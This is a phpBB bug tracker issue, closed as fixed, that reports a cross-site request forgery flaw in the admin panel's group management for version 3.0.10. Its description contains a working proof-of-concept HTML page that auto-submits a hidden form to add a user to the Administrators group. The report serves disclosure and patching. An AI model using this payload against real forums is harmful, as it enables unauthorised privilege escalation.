[PHPBB3-10840] If you add a member to a group, the form_token can be set to 0 if the creation_time is 0 too. Maybe even if creation_time is unchanged.

XML

Word

Printable

Details

Type: Bug
Status: Closed (View Workflow)
Priority: Blocker
Resolution: Fixed
Affects Version/s: 3.0.10
Fix Version/s: 3.0.12-RC1
Component/s: ACP
Labels:
None

GitHub Pull Request URL:
https://github.com/phpbb/phpbb3/pull/1457

Description

You can use Cross Side Request Forgery (if you know the sid) to add users to any group you want.

Example for the CSRF:

UrlToAdminIndexPHP: http://www.example.com/phpBB/adm/index.php
GroupID: 5 (Administrator)
Username: KDSBest

This is hard to get normaly
SID: 73f11ebfa81616c0911ae0c9cbd6010d

<html>
<head>
<script type="text/javascript">
function submitForm()

{ document.forms[0].submit(); }

</script>
</head>
<body onLoad="submitForm()">
<form action="

{UrlToAdminIndexPHP}

?&sid=

{SID}

&i=groups&icat=12&mode=manage&g=

{GroupID}

" method="post" id="list">
<input type="hidden" value="0" name="leader">
<input type="hidden" value="0" name="default">
<input type="hidden" value="

{Username}

" name="usernames">
<input type="hidden" value="XXX" name="addusers">
<input type="hidden" value="0" name="creation_time">
<input type="hidden" value="0" name="form_token">
</form>
</body>
</html>

To make it harder to create a CSRF the field form_token should be checked server side.

Attachments

Activity

People

Assignee:: Joas Schilling

Reporter:: kdsbest

Votes:: 0 Vote for this issue

Watchers:: 0 Start watching this issue

Dates

Created:: 21/Apr/12 9:48 PM

Updated:: 22/Jan/17 4:01 PM

Resolved:: 03/Jun/13 1:50 PM